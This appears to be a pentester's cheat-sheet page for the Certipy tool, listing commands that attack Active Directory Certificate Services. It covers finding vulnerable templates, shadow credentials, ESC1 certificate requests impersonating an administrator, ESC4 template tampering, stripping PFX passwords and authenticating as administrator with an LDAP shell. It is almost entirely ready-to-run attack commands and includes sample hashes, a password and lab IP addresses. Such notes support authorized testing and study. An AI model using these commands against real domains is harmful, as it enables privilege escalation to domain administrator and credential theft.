certipy

Find Vulnerable Template

Find vulnerable template

certipy find -u 'user' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce'  -dc-ip 10.10.11.51  
certipy find -u '[email protected]' -p <password> -dc-ip <DC_IP> -vulnerable -enabled
certipy find -u '[email protected]' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce'  -dc-ip 10.10.11.51

Shadow Credential

Get Shadow credentials

certipy-ad shadow auto -u '[email protected]' -p "WqSZAF6CysDQbGb3" -account 'user_2' -dc-ip '10.10.11.51'

ESC1

Exploit ESC1

certipy-ad req -u user -target domain.local -upn [email protected] -ca sequel-DC01-CA -template template_name -hashes 3b181b914e7a9d5508ea1e20bc2b7fce:3b181b914e7a9d5508ea1e20bc2b7fce -key-size 4096  -dns 10.10.11.51 -dc-ip 10.10.11.51

certipy-ad req -u user -target domain.local -web -port 80 -subject 'DIstinguishedName' -sid 'SID -debug' -ca sequel-DC01-CA -template template_name -target-ip <ip_ca>

ESC4

Exploit ESC4

certipy template -username [email protected]  -hashes 3b181b914e7a9d5508ea1e20bc2b7fce  -template templateName  -save-old

certipy template -username [email protected]  -p -dc-ip ip_dc -template templateName  -save-old  -configuration configuration.json

Using PFXS withou password

Certipy's commands don't support PFXs with password. The following command can be used to "unprotect" a PFX file.

certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"

Auth using pfx

certipy auth -pfx administrator.pfx -domain domain.local

certipy auth -pfx administrator.pfx -domain domain.local --ldap-shell

Bloodhound

certipy find -u '[email protected]' -p 'Password123!' -dc-ip 10.129.205.199 -bloodhound

Risorse

https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate
https://github.com/ly4k/Certipy/blob/main/README.md

PreviousPowerView Nextsqlmap

Last updated 7 months ago